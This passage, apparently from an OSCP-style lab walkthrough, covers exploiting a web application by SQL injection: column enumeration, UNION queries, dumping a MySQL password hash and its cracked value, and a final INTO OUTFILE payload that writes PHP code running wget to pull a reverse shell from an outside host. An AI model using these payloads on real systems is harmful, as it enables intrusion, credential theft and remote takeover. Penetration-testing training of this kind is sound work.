Exploitation

SQL Injection

After testing for LFI and RFI and SQLi, we learn the the application is vulnerable to SQL injection by implementing the sleep command. For the following exploitation, we will use the manual method for OSCP practice and the SQLi method for better practice.

Method 1: Manual SQLi

testing with the SQLi sleep command, this demonstrates that the webpage is vulnerable to SQL injection the %20 is a space that is URL encoded

successful

Likewise you can do it this method:

Checking for columns using the ORDER BY SQLi

Step 1: Column Enumeration

Select * FROM table
ORDER BY column-name

The above SQL statement prints out all the columns in the "table" table and orders the result based on the column "column-name" with column-name, you can use an interger instead of column-name.

Example:

Select * FROM table
ORDER BY 1

The above statement prints out all the columns in the table "table" and orders teh result based on the first column in the table. Knowing that we can abuse it by ordering a column that does not exist. If the column does not exist we will either:

  • Have the application behave weirdly or

  • Have the application throw an error based on the validation that is being done at the backend.

To enumerate the number of columns, we will use the ORDER BY SQL statement until the application throws an error or no longer gives us a result.

ORDER BY 7

Because of the above SQL statements, we can conclude that the query is using exactly 7 columns. Let's determine which of these columns are getting outputted on the page.

Step 2: Column Presentation and Type

Using SQL UNION Operator, we can determine where the column result is being outputted on the page. Here is a sample of the query.

SELECT column-name-1 FROM table1
UNION
SELECT column-name-2 FROM table2;

The above statement does select on "column-name-1" from "table1" and then does a select on "column-name-2" from "table-2" and uses the UNION operator to combine the results of the two select statements. NOTE: The number of columns have to be the same in both select statements form the query to work

Knowing this, we can analyze the following statement. 

SELECT column-name-1 FROM table1
UNION
SELECT 1

The first select statement does a query on "column-name-1" from "table1" and the second select statement simply prints out the value of 1. The union of these two statements is the combination of the results. Depending on certain conditions such as matchig data types of the columnd, the above query might generate an error. Keep that in mind.

At first with a known cod value, we got the output of the first select statement, but not the second. A possible reason, in my case nothing. Possible reason is that the application can only print out one entry at a time. Modifying our cod value to something that doesn't exist, print's out the result from the second statement. This allows us to known what columns correspond to the elements in the page.

Step 3: Retrieve Backend Information

MySQL SQL Injection Cheat Sheetpentestmonkey

We can use SQL commands to further enumerate and exploit the database

SELECT host, user, password FROM mysql.user

gives nothing because we're querying more than one column in the sub select query. We can verify by just outputting the password column. 

SELECT password FROM mysql.user
HASH Found!

We get a hash! Inorder to output multiple columns, you can use the group_concat() function

SELECT group_concat(host,user,password) FROM mysql.user

Found Username and HASH

  • Username: DBadmin

  • Hash: 2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

  • Password: imissyou

LogoCrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.

An alternate method is using the LOAD_FILE, this would of been useful if MYSQL was running as root. It was not the case for this box.

Step 4: Command Execution

We can add php code via SQL, in order to do so, we need to save that code into a file and then somehow call the file and execute the code.

Set up your PHP reverse SHELL and listener and inpu the following SQL query

9999 union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.34:5555/php-reverse-shell.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'
What the above query does, is it saves the entire query (including the PHP code) into 
the file /var/www/html/test4.php. This is the root directory of the web server. So when 
we call the test4.php script, it will execute the php code that we included in our select
statement and download the reverse shell.

This copies and downloads the php script into /var/www/html/ folder

The file is executed when shell.php is called

Connection Established

PreviousScanning and EnumerationNextPost Exploitation

Last updated

Was this helpful?